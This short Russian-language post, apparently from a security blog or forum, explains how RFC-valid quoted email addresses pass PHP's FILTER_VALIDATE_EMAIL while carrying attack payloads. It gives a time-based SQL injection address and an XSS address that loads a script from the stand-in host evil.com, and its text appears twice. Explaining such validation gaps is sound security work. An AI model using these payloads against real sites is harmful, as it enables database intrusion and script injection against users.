После эксплутации инъекции в sql с помощью следующего email адреса
невольно задумываешься: а какого хера это вообще пропустило как валидный email?
В целом, локальная часть (логин, до @) email’а может сожержать спецсимволы по RFC, если она заключена в двойные кавычки. А дальше - уже любимые языки программирования немного отходят от того, какие именно символы можно использовать.
Поэтому, следующая магия:
Провалидирует и вполне законно вернет мыло с вектором атаки:
А там как дальше разработчики его отображают - отдельный вопрос.
"'-sleep(5)-'"@mail.localневольно задумываешься: а какого хера это вообще пропустило как валидный email?
В целом, локальная часть (логин, до @) email’а может сожержать спецсимволы по RFC, если она заключена в двойные кавычки. А дальше - уже любимые языки программирования немного отходят от того, какие именно символы можно использовать.
Поэтому, следующая магия:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);”Провалидирует и вполне законно вернет мыло с вектором атаки:
"'--><script/src=//evil.com></script>"@example.comА там как дальше разработчики его отображают - отдельный вопрос.